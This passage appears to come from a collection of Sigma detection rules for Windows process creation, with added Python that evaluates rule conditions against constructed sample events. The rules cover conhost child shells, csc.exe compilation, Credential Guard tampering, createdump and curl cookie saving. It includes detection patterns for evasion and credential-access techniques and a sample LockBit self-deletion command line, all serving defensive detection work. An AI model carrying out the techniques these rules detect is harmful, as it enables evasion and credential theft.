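    hits = [any(_match_one(event.get(name), op, v) for v in g) for g in groups]
    return all(hits) if "all" in mods else any(hits)


def selection_matches(event, sel):
    """A mapping is AND over its fields; a list of mappings is OR over them."""
    if isinstance(sel, list):
        return any(selection_matches(event, s) for s in sel)
    return all(_field_matches(event, spec, vals) for spec, vals in sel.items())


def _eval_bool(node):
    """Evaluate an and/or/not tree over True/False literals and nothing else."""
    if isinstance(node, ast.Constant) and isinstance(node.value, bool):
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
        return not _eval_bool(node.operand)
    if isinstance(node, ast.BoolOp):
        vals = [_eval_bool(v) for v in node.values]
        return all(vals) if isinstance(node.op, ast.And) else any(vals)
    raise ValueError("unsupported condition syntax")


def evaluate(rule, event):
    """Resolve every selection to True/False, then evaluate the condition expression."""
    det = rule["detection"]
    sels = {k: v for k, v in det.items() if k != "condition"}

    def quantified(m):  # 'all of prefix*' or '1 of prefix*'
        quant, prefix = m.group(1), m.group(2)
        hits = [selection_matches(event, sels[n]) for n in sels if n.startswith(prefix)]
        return str(all(hits) if quant == "all" else sum(hits) >= int(quant))

    expr = re.sub(r"\b(all|\d+) of (\w+)\*", quantified, det["condition"])
    expr = re.sub(r"\b(?!True\b|False\b|and\b|or\b|not\b)(\w+)\b",
                  lambda m: str(selection_matches(event, sels[m.group(1)])), expr)
    return _eval_bool(ast.parse(expr, mode="eval").body)


RULES = {  # detection blocks transcribed from the rules on this page
    "ping_del": {"detection": {
        "selection_count": {"CommandLine|contains|windash": " -n "},
        "selection_nul": {"CommandLine|contains": "Nul"},
        "selection_del_param": {"CommandLine|contains|windash": [" -f ", " -q "]},
        "selection_all": {"CommandLine|contains|all": ["ping", "del "]},
        "condition": "all of selection_*"}},
    "cmdkey_recon": {"detection": {
        "selection_img": [{"Image|endswith": "\\cmdkey.exe"}, {"OriginalFileName": "cmdkey.exe"}],
        "selection_cli": {"CommandLine|contains|windash": " -l"},
        "condition": "all of selection*"}},
    "conhost_child": {"detection": {
        "selection": {"ParentImage|endswith": "\\conhost.exe"},
        "filter_main_conhost": {"Image|endswith": ":\\Windows\\System32\\conhost.exe"},
        "filter_main_null": {"Image": None},
        "filter_main_empty": {"Image": ""},
        "filter_optional_provider": {"Provider_Name": "SystemTraceProvider-Process"},
        "condition": "selection and not 1 of filter_main_* and not 1 of filter_optional_*"}},
}

SYS32 = "C:\\Windows\\System32\\"
EVENTS = {  # constructed sample process_creation events, not real telemetry
    "lockbit_cleanup": {"Image": SYS32 + "cmd.exe", "ParentImage": "C:\\Users\\User\\Desktop\\lockbit\\lockbit.exe",
                        "CommandLine": '"C:\\Windows\\System32\\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & '
                                       'Del /f /q "C:\\Users\\User\\Desktop\\lockbit\\lockbit.exe"'},
    "benign_ping": {"Image": SYS32 + "PING.EXE", "ParentImage": SYS32 + "cmd.exe",
                    "CommandLine": "ping -n 4 10.0.0.1 > Nul"},
    "cmdkey_list": {"Image": SYS32 + "cmdkey.exe", "ParentImage": SYS32 + "cmd.exe", "CommandLine": "cmdkey /list"},
    "conhost_cmd": {"Image": SYS32 + "cmd.exe", "ParentImage": SYS32 + "conhost.exe", "CommandLine": "cmd.exe /c whoami"},
    "conhost_self": {"Image": SYS32 + "conhost.exe", "ParentImage": SYS32 + "conhost.exe",
                     "CommandLine": "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"},
}


def rules_fired(event):
    """Names of the rules whose condition holds for one event."""
    return sorted(n for n, r in RULES.items() if evaluate(r, event))
```

`rules_fired(EVENTS["lockbit_cleanup"])` returns `["ping_del"]` because `Del /f /q` satisfies the windash-expanded ` -f ` value, while the benign `ping -n 4 ... > Nul` line passes the count and Nul selections but has no deletion flag; the conhost-spawning-conhost event is suppressed by the `filter_main_conhost` exclusion, which is exactly what the `and not 1 of filter_main_*` clause is for.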
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml",
    "content": "title: Potentially Suspicious Child Processes Spawned by ConHost\nid: dfa03a09-8b92-4d83-8e74-f72839b1c407\nrelated:\n    - id: 7dc2dedd-7603-461a-bc13-15803d132355\n      type: similar\nstatus: experimental\ndescription: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.t1202\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\conhost.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\cmd.exe'             # Windows Command Prompt\n              - '\\cscript.exe'         # Windows Script Host (used for scripting exploits)\n              - '\\mshta.exe'           # MSHTA (HTML Application Host, often abused)\n              - '\\powershell_ise.exe'  # PowerShell ISE\n              - '\\powershell.exe'      # Windows PowerShell\n              - '\\pwsh.exe'            # PowerShell Core\n              - '\\regsvr32.exe'        # Windows Registry Server (commonly used for exploits)\n              - '\\wscript.exe'         # Windows Script Host (for executing scripts)\n        - OriginalFileName:\n              - 'cmd.exe'\n              - 'cscript.exe'\n              - 'mshta.exe'\n              - 'powershell_ise.exe'\n              - 'powershell.exe'\n              - 'pwsh.dll'\n              - 'regsvr32.exe'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml",
    "content": "title: Conhost Spawned By Uncommon Parent Process\nid: cbb9e3d1-2386-4e59-912e-62f1484f7a89\nstatus: test\ndescription: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-28\nmodified: 2025-03-06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\conhost.exe'\n        ParentImage|endswith:\n            - '\\explorer.exe'\n            # - '\\csrss.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe\n            # - '\\ctfmon.exe'  # Seen several times in a testing environment\n            # - '\\dllhost.exe'  # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p'\n            - '\\lsass.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\services.exe'\n            - '\\smss.exe'\n            - '\\spoolsv.exe'\n            - '\\svchost.exe'\n            - '\\userinit.exe'\n            # - '\\wermgr.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n    filter_main_svchost:\n        ParentCommandLine|contains:\n            - '-k apphost -s AppHostSvc'\n            - '-k imgsvc'\n            - '-k localService -p -s RemoteRegistry'\n            - '-k LocalSystemNetworkRestricted -p -s NgcSvc'\n            - '-k NetSvcs -p -s NcaSvc'\n            - '-k netsvcs -p -s NetSetupSvc'\n            - '-k netsvcs -p -s wlidsvc'\n            - '-k NetworkService -p -s DoSvc'\n            - '-k wsappx -p -s AppXSvc'\n            - '-k wsappx -p -s ClipSVC'\n       
     - '-k wusvcs -p -s WaaSMedicSvc'\n    filter_optional_dropbox:\n        ParentCommandLine|contains:\n            - 'C:\\Program Files (x86)\\Dropbox\\Client\\'\n            - 'C:\\Program Files\\Dropbox\\Client\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_control_panel_item.yml",
    "content": "title: Control Panel Items\nid: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4\nstatus: test\ndescription: Detects the malicious use of a control panel item\nreferences:\n    - https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins\nauthor: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)\ndate: 2020-06-22\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218.002\n    - attack.persistence\n    - attack.t1546\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_cli:\n        CommandLine|contains|all:\n            - 'add'\n            - 'CurrentVersion\\Control Panel\\CPLs'\n    selection_cpl:\n        CommandLine|endswith: '.cpl'\n    filter_cpl_sys:\n        CommandLine|contains:\n            - '\\System32\\'\n            - '%System%'\n            - '|C:\\Windows\\system32|'\n    filter_cpl_igfx:\n        CommandLine|contains|all:\n            - 'regsvr32 '\n            - ' /s '\n            - 'igfxCPL.cpl'\n    condition: all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml",
    "content": "title: CreateDump Process Dump\nid: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48\nrelated:\n    - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e\n      type: similar\nstatus: test\ndescription: Detects uses of the createdump.exe LOLOBIN utility to dump process memory\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\n    - https://twitter.com/bopin2020/status/1366400799199272960\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-04\nmodified: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\createdump.exe'\n        - OriginalFileName: 'FX_VER_INTERNALNAME_STR'\n    selection_cli:\n        CommandLine|contains:\n            - ' -u ' # Short version of '--full'\n            - ' --full '\n            - ' -f ' # Short version of '--name'\n            - ' --name '\n            - '.dmp '\n    condition: all of selection_*\nfalsepositives:\n    - Command lines that use the same flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering.yml",
    "content": "title: Windows Credential Guard Registry Tampering Via CommandLine\nid: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\nrelated:\n    - id: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0\n      type: similar\n    - id: d645ef86-2396-48a1-a2b6-b629ca3f57ff\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to add, modify, or delete Windows Credential Guard related registry keys or values via command line tools such as Reg.exe or PowerShell.\n    Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\n    Adversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\n    The rule matches suspicious command lines that target DeviceGuard or LSA registry paths and manipulate keys like EnableVirtualizationBasedSecurity, RequirePlatformSecurityFeatures, or LsaCfgFlags.\n    Such activity may indicate an attempt to disable or tamper with Credential Guard, potentially exposing sensitive credentials for misuse.\nreferences:\n    - https://woshub.com/disable-credential-guard-windows/\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-deviceguard\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli:\n        CommandLine|contains:\n            # add/modify\n            - 'add '\n            - 'New-ItemProperty '\n            - 'Set-ItemProperty '\n            - 'si '  # 
SetItem Alias\n            # delete\n            - 'delete '\n            - 'del '\n            - 'Remove-ItemProperty '\n            - 'rp '\n    selection_key_base:\n        CommandLine|contains:\n            - '\\Control\\DeviceGuard'\n            - '\\Control\\LSA'\n            - 'Software\\Policies\\Microsoft\\Windows\\DeviceGuard'\n    selection_key_specific:\n        CommandLine|contains:\n            - 'EnableVirtualizationBasedSecurity'\n            - 'RequirePlatformSecurityFeatures'\n            - 'LsaCfgFlags'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml",
    "content": "title: Dynamic .NET Compilation Via Csc.EXE\nid: dcaa3f04-70c3-427a-80b4-b870d73c94c4\nstatus: test\ndescription: Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.\nreferences:\n    - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/\n    - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf\n    - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/\n    - https://twitter.com/gN3mes1s/status/1206874118282448897\n    - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe\nauthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2019-08-24\nmodified: 2024-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\csc.exe'\n    selection_susp_location_1:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\' # User execution\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp\\' # Admin execution\n    selection_susp_location_2:\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    selection_susp_location_3:\n        CommandLine|re: '([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$'\n    
filter_main_programfiles:\n        # Note: this is a generic filter. You could baseline execution in your env for a more robust rule\n        ParentImage|startswith:\n            - 'C:\\Program Files (x86)\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n            - 'C:\\Program Files\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_sdiagnhost:\n        ParentImage: 'C:\\Windows\\System32\\sdiagnhost.exe' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_w3p:\n        ParentImage: 'C:\\Windows\\System32\\inetsrv\\w3wp.exe' # https://twitter.com/gabriele_pippi/status/1206907900268072962\n    filter_optional_chocolatey:\n        ParentImage: # Chocolatey https://chocolatey.org/\n            - 'C:\\ProgramData\\chocolatey\\choco.exe'\n            - 'C:\\ProgramData\\chocolatey\\tools\\shimgen.exe'\n    filter_optional_defender:\n        ParentCommandLine|contains: '\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection'\n    filter_optional_ansible:\n        # Note: As ansible is widely used we exclude it with this generic filter.\n        # A better option would be to filter based on script content basis or other marker while hunting\n        ParentCommandLine|contains:\n            # '{\"failed\":true,\"msg\":\"Ansible requires PowerShell v3.0 or newer\"}'\n            - 'JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw'\n            - 'cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA'\n            - 'nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA'\n    condition: selection_img and 1 of 
selection_susp_location_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897\n    - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962\n    - Ansible\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml",
    "content": "title: Csc.EXE Execution From Potentially Suspicious Parent\nid: b730a276-6b63-41b8-bcf8-55930c8fc6ee\nstatus: test\ndescription: Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.\nreferences:\n    - https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\n    - https://reaqta.com/2017/11/short-journey-darkvnc/\n    - https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2019-02-11\nmodified: 2024-05-27\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.defense-evasion\n    - attack.t1218.005\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\csc.exe'\n        - OriginalFileName: 'csc.exe'\n    selection_parent_generic:\n        ParentImage|endswith:\n            - '\\cscript.exe'\n            - '\\excel.exe'\n            - '\\mshta.exe'\n            - '\\onenote.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\wscript.exe'\n    selection_parent_powershell:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        ParentCommandLine|contains:\n            - '-Encoded '\n            - 'FromBase64String'\n    selection_parent_susp_location:\n        - ParentCommandLine|re: '([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$'\n        - ParentCommandLine|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Users\\Public\\'\n              - ':\\Windows\\Temp\\'\n              - '\\Temporary Internet'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    filter_main_programfiles:\n        # Note: this is a generic filter. You could baseline execution in your env for a more robust rule\n        ParentImage|startswith:\n            - 'C:\\Program Files (x86)\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n            - 'C:\\Program Files\\' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_sdiagnhost:\n        ParentImage: 'C:\\Windows\\System32\\sdiagnhost.exe' # https://twitter.com/gN3mes1s/status/1206874118282448897\n    filter_main_w3p:\n        ParentImage: 'C:\\Windows\\System32\\inetsrv\\w3wp.exe' # https://twitter.com/gabriele_pippi/status/1206907900268072962\n    filter_optional_chocolatey:\n        ParentImage: 'C:\\ProgramData\\chocolatey\\choco.exe' # Chocolatey https://chocolatey.org/\n    filter_optional_defender:\n        ParentCommandLine|contains: '\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection'\n    filter_optional_ansible:\n        # Note: As ansible is widely used we exclude it with this generic filter.\n        # A better option would be to filter based on script content basis or other marker while hunting\n        ParentCommandLine|contains:\n            # '{\"failed\":true,\"msg\":\"Ansible requires PowerShell v3.0 or newer\"}'\n            - 'JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw'\n            - 'cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA'\n            - 'nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA'\n    condition: selection_img and 1 of selection_parent_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
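The `selection_susp_location_3` regex in rule dcaa3f04 and the `selection_parent_susp_location` regex in rule b730a276 are the same pattern, and two of its properties are easy to misread. The trailing `\\[^\\]{1,256}$` only matches when no further backslash follows the `ProgramData`, `%AppData%`, `\AppData\Local`, `\AppData\LocalLow` or `\AppData\Roaming` component, so a file one directory deeper is caught only if a plain-substring selection such as `\AppData\Local\Temp\` covers it; and the `{1,256}` bound stops matching once the backslash-free tail is longer than 256 characters. The Python below is an added example, not part of the Sigma project: it lifts the regex and the `selection_susp_location_1` substring list from the rule text above and runs both over constructed csc.exe command lines. The `CASES` names and paths are made up for illustration.

```python
import re

# Pattern copied verbatim from selection_susp_location_3 (rule dcaa3f04) and
# selection_parent_susp_location (rule b730a276). It is single-quoted in the
# YAML, so `\\` there is one literal backslash in the regular expression.
SUSP_LOCATION_RE = re.compile(
    r"([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%"
    r"|\\[Aa]pp[Dd]ata\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$"
)

# Substrings from selection_susp_location_1 of rule dcaa3f04. Sigma `contains`
# is case-insensitive, so they are compared casefolded.
SUSP_LOCATION_SUBSTRINGS = (
    ":\\Perflogs\\", ":\\Users\\Public\\", "\\AppData\\Local\\Temp\\",
    "\\Temporary Internet", "\\Windows\\Temp\\",
)


def regex_hit(command_line):
    """selection_susp_location_3: case-sensitive regex, as Sigma `re` is."""
    return SUSP_LOCATION_RE.search(command_line) is not None


def substring_hit(command_line):
    """selection_susp_location_1: any plain substring, case-insensitive."""
    folded = command_line.casefold()
    return any(s.casefold() in folded for s in SUSP_LOCATION_SUBSTRINGS)


# Constructed csc.exe command lines (not real telemetry), named after the
# behaviour each one illustrates.
CASES = {
    # the last backslash-free segment follows ProgramData: regex matches
    "programdata_src": r"csc.exe /nologo /out:C:\ProgramData\stage.dll C:\ProgramData\stage.cs",
    # %AppData% environment-variable form, same alternation
    "appdata_env": r"csc.exe /target:library %AppData%\update.cs",
    # one directory deeper than \AppData\Local: the regex fails because a
    # backslash follows, the \AppData\Local\Temp\ substring catches it instead
    "appdata_local_temp": r"csc.exe C:\Users\bob\AppData\Local\Temp\tmp1A2B.cs",
    # deeper under Roaming: neither selection fires
    "appdata_roaming_subdir": r"csc.exe C:\Users\bob\AppData\Roaming\Updater\build.cs",
    # tail longer than the {1,256} bound: the regex no longer matches
    "programdata_long_tail": "csc.exe /out:C:\\ProgramData\\" + "a" * 257 + ".dll",
    # Users\Public appears only in the substring list
    "users_public": r"csc.exe C:\Users\Public\run.cs",
}


def classify(command_line):
    """(regex selection hit, substring selection hit) for one command line."""
    return regex_hit(command_line), substring_hit(command_line)


def classify_all():
    return {name: classify(cmd) for name, cmd in CASES.items()}


if __name__ == "__main__":
    for name, (rx, sub) in classify_all().items():
        print(f"{name:24s} regex={rx!s:5s} substring={sub}")
```

The `appdata_roaming_subdir` and `programdata_long_tail` cases are the ones to keep in mind when tuning: they slip past both selections of dcaa3f04, and only the parent-based selections of b730a276 or an environment-specific baseline would cover them.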
  {
    "path": "rules/windows/process_creation/proc_creation_win_csi_execution.yml",
    "content": "title: Suspicious Csi.exe Usage\nid: 40b95d31-1afc-469e-8d34-9a3a667d058e\nstatus: test\ndescription: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter on the command line. An early version of this utility, provided with the Microsoft “Roslyn” Community Technology Preview, was named 'rcsi.exe'.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/\n    - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/\n    - https://twitter.com/Z3Jpa29z/status/1317545798981324801\nauthor: Konstantin Grishchenko, oscd.community\ndate: 2020-10-17\nmodified: 2022-07-11\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1072\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\csi.exe'\n              - '\\rcsi.exe'\n        - OriginalFileName:\n              - 'csi.exe'\n              - 'rcsi.exe'\n    selection_cli:\n        Company: 'Microsoft Corporation'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate usage by software developers\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml",
    "content": "title: Suspicious Use of CSharp Interactive Console\nid: a9e416a8-e613-4f8b-88b8-a7d1d1af2f61\nstatus: test\ndescription: Detects the execution of the C# interactive console (csi.exe) with PowerShell as the parent process\nreferences:\n    - https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/\nauthor: Michael R. (@nahamike01)\ndate: 2020-03-08\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\csi.exe'\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\powershell_ise.exe'\n        OriginalFileName: 'csi.exe'\n    condition: selection\nfalsepositives:\n    - Possible depending on the environment. Pair with other factors such as network connections and command-line arguments.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_csvde_export.yml",
    "content": "title: Active Directory Structure Export Via Csvde.EXE\nid: e5d36acd-acb4-4c6f-a13f-9eb203d50099\nstatus: test\ndescription: Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.\nreferences:\n    - https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms\n    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\n    - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit\n    - https://redcanary.com/blog/msix-installers/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\ntags:\n    - attack.exfiltration\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\csvde.exe'\n        - OriginalFileName: 'csvde.exe'\n    selection_remote:\n        CommandLine|contains: ' -f'\n    filter_import:\n        CommandLine|contains: ' -i'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml",
    "content": "title: Potential Cookies Session Hijacking\nid: 5a6e1e16-07de-48d8-8aae-faa766c05e88\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"-c\" flag in order to save cookie data.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        - CommandLine|re: '\\s-c\\s'\n        - CommandLine|contains: '--cookie-jar'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml",
